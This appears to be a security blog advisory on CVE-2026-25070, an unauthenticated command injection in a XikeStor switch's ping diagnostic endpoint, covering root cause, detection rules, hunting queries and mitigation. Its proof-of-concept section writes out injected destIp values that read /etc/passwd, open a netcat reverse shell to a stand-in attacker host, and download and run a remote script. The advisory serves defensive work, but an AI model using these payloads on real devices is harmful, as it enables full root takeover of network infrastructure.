CVE-2026-25070: Critical Command Injection Flaw in XikeStor SKS8310-8X Switch Enables Unauthenticated Remote Root Access

Aegiron 12 mins0

CVE-2026-25070 – XikeStor SKS8310-8X Switch OS Command Injection

CVE ID: CVE-2026-25070
Product: XikeStor SKS8310-8X Managed Network Switch
Affected Versions: Firmware 1.04.B07 and earlier
Vulnerability Type: OS Command Injection
CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Severity: Critical
CVSS v3.x Score: 9.3 (Critical)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
Exploitability: High
Exploit Availability: No widely distributed exploit framework observed yet, however exploitation is considered straightforward due to the absence of input validation and authentication.
Authentication Requirement: Not required
Impact: Unauthenticated Remote Code Execution as root user

Overview

A critical vulnerability has been identified in the XikeStor SKS8310-8X managed network switch firmware. The flaw exists within the device’s web management interface and allows unauthenticated remote attackers to execute arbitrary operating system commands.

The vulnerability originates from improper input validation in the Ping diagnostic function exposed through the endpoint:

/goform/PingTestSet

This endpoint accepts user supplied input through the destIp parameter. Instead of validating or sanitizing the input, the firmware passes the value directly into an operating system command used to perform a ping operation.

Because the command is executed by the system shell, specially crafted input containing shell operators can cause additional commands to be executed. As the web service on the switch runs with root privileges, any injected command is also executed with root level permissions, leading to full compromise of the device.

Affected Component

Component: Web management interface
Endpoint:

/goform/PingTestSet

Vulnerable Parameter:

destIp

This parameter is expected to contain an IP address used for network connectivity testing. However, due to lack of sanitization, shell control characters can be injected.

Technical Root Cause

The vulnerability is caused by unsafe command execution logic in the ping testing feature.

In the firmware, the user supplied IP address is concatenated into a shell command similar to:

ping <destIp>

The command is then executed using a system shell call. When input validation is missing, shell metacharacters are interpreted as command separators.

Examples of such characters include:

;
|
&&
||
`
$

When one of these operators is included within the input, additional commands are executed after the ping command.

Because the switch firmware runs with root privileges, the attacker gains full control over the underlying Linux system.

Vulnerability Type

The vulnerability falls under OS Command Injection.

This class of vulnerability occurs when:

  1. User controlled input is inserted into a command.
  2. The command is executed by the operating system.
  3. Input validation is not performed.
  4. Shell metacharacters are interpreted by the system shell.

Such flaws frequently appear in embedded devices and IoT firmware, where diagnostic tools such as ping, traceroute, or network scans are implemented without secure input filtering.

Exploitation Scenario

Exploitation can be performed remotely if the management interface of the switch is reachable.

The attack process typically follows these steps:

  1. The attacker identifies a network exposed XikeStor SKS8310-8X switch.
  2. The management interface is accessed through HTTP.
  3. A crafted HTTP request is sent to /goform/PingTestSet.
  4. The attacker injects malicious shell syntax inside the destIp parameter.
  5. The injected command is executed by the device operating system.

Because authentication is not required, the vulnerability can be exploited without credentials.

Proof-of-Concept Payload (Educational Use Only)

The following payload examples demonstrate how command injection may occur.

Basic command execution

destIp=8.8.8.8;id

Expected result:

ping 8.8.8.8
id

The id command is executed after the ping command.

System information retrieval

destIp=8.8.8.8;uname -a

Reading sensitive files

destIp=8.8.8.8;cat /etc/passwd

Reverse shell attempt

destIp=8.8.8.8;nc attacker-ip 4444 -e /bin/sh

Remote payload download

destIp=8.8.8.8;wget http://attacker/payload.sh -O /tmp/payload.sh;sh /tmp/payload.sh

These payloads illustrate how attackers can move from simple command execution to persistent compromise.

Potential Impact

Successful exploitation can result in complete control over the network switch.

Possible consequences include:

Network manipulation

Attackers may modify switch configuration such as VLAN assignments, routing tables, or port settings.

Traffic interception

Since the switch controls packet forwarding, traffic passing through the device may be intercepted or redirected.

Lateral movement

Once compromised, the switch can be used as a pivot point for attacking internal network systems.

Persistent backdoor

Malicious scripts or binaries may be placed on the device to maintain long-term access.

Network disruption

Attackers may disable switching functions, modify configurations, or reboot the device, resulting in service outages.

MITRE ATT&CK Mapping

T1190 – Exploit Public Facing Application
The vulnerable management interface can be accessed remotely and exploited through crafted HTTP requests.

T1059 – Command and Scripting Interpreter
Injected shell commands allow attackers to execute arbitrary system commands.

T1105 – Ingress Tool Transfer
Payloads may download additional malicious tools onto the switch.

T1046 – Network Service Discovery
Compromised switches may scan internal networks to discover additional targets.

T1071 – Application Layer Protocol
Communication with attacker infrastructure may occur using HTTP or DNS.

Detection

Detection should focus on abnormal requests targeting the Ping diagnostic endpoint and the presence of shell operators in parameters.

Indicators include:

  • Requests targeting /goform/PingTestSet
  • Requests containing shell metacharacters in destIp
  • Unexpected outbound connections initiated by the switch
  • Suspicious command execution patterns

Common injection indicators:

;
|
&&
||
`
$

Educational Suspicious Requests

POST /goform/PingTestSet
destIp=8.8.8.8;id
POST /goform/PingTestSet
destIp=1.1.1.1|whoami
POST /goform/PingTestSet
destIp=8.8.8.8&&cat /etc/passwd

Detection Rules

IDS / IPS Rule (Suricata)

alert http any any -> any any (
msg:"XikeStor SKS8310-8X PingTestSet Command Injection Attempt";
flow:to_server,established;
content:"/goform/PingTestSet";
http_uri;
pcre:"/destIp=.*(;|\||&&|`|\$)/";
classtype:web-application-attack;
sid:90025070;
rev:1;
)

Network Detection Rule (Snort)

alert tcp any any -> any 80 (
msg:"XikeStor PingTestSet Command Injection";
flow:to_server,established;
content:"/goform/PingTestSet";
http_uri;
pcre:"/destIp=.*(;|\||&&)/";
sid:10025070;
rev:1;
)

Log Source

The following log sources are useful for identifying exploitation attempts:

Web Management Logs

  • HTTP access logs
  • Administrative activity logs

Network Security Logs

  • IDS / IPS alerts
  • Firewall logs
  • Network traffic inspection

Device System Logs

  • Process execution logs
  • System command logs
  • Configuration change logs

Network Monitoring

  • Unexpected outbound connections from network infrastructure devices
  • DNS queries initiated by the switch

Threat Hunting Queries

Splunk Query

index=network_logs
uri="/goform/PingTestSet"
| search destIp="*;*" OR destIp="*|*" OR destIp="*&&*"

Elastic / KQL Query

url.path : "/goform/PingTestSet" and 
(request.body : "*;*" or request.body : "*|*" or request.body : "*&&*")

Generic SIEM Query

url="/goform/PingTestSet"
AND (request_body LIKE "%;%" OR request_body LIKE "%|%" OR request_body LIKE "%&&%")

Indicators of Compromise

Security teams should investigate if any of the following signs are observed:

  • Unknown outbound connections from the switch
  • Unexpected system processes running on the device
  • Unknown configuration modifications
  • Newly created administrator accounts
  • Suspicious shell commands executed by the device

Mitigation

Immediate defensive measures should include:

  • Restricting management interface access to internal administrative networks only
  • Blocking external access to switch management ports
  • Monitoring HTTP requests targeting diagnostic endpoints
  • Implementing network segmentation for infrastructure devices

Regular firmware updates should also be applied to prevent exploitation.

Patch / Upgrade

The vulnerability has been addressed through firmware updates that introduce proper input validation for the Ping diagnostic feature.

Administrators should upgrade affected devices to a secure firmware version newer than 1.04.B07.

Official firmware information and upgrade guidance:

https://openwrt.org/toh/xikestor/sks8310-8x

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.